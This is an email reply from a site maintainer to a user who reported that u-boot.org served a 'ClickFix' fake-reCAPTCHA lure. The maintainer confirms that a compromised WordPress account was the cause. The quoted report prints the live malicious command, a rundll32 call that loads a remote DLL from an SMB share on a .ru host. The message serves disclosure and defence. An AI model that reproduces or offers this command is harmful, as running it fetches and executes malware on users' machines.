Hi Zayn, On Mon, 23 Feb 2026 at 03:02, zayn beedooles <[email protected]> wrote: > > I am reporting u-boot.org for hosting a "ClickFix" malware attack. The site > uses a fake Google reCAPTCHA overlay to trick users into running a > malicious command via the Windows Run dialog. > > *Malicious Command:* rundll32.exe \\hill-side-view-point.freshhill.ru > \service\verification.google,#1 > > The command uses rundll32.exe to execute a remote DLL from a Russian SMB > share, bypassing browser sandboxing. HAR logs confirm the site is > compromised and injecting these scripts into the user's session. This is a > high-risk social engineering attack targeting developers. > > First, it tells the user to run this in the Run dialog to "continue" using > the website, but it gives the hacker control. It uses the legitimate > Windows `rundll32.exe` utility to execute code outside the browser's safe > "sandbox". > The command points to a remote SMB share on the Russian domain ` > hill-side-view-point.freshhill.ru`* > It attempts to load and run a malicious DLL disguised as ` > verification.google`, likely an infostealer or ransomware. > > I don't know if this may be the wrong person, but I have already reported > the malware and your website to prevent more victims from getting hacked by > Russians. How do I know? "hill-side-view-point.freshhill.ru", it ends with > ".ru". Thank you and have a good day.
Thanks for the report. An old wordpress account was compromised. It has been deleted and various measures have been put in place to ensure there is no repeat. We can share more detail privately to those interested. Regards, Simon
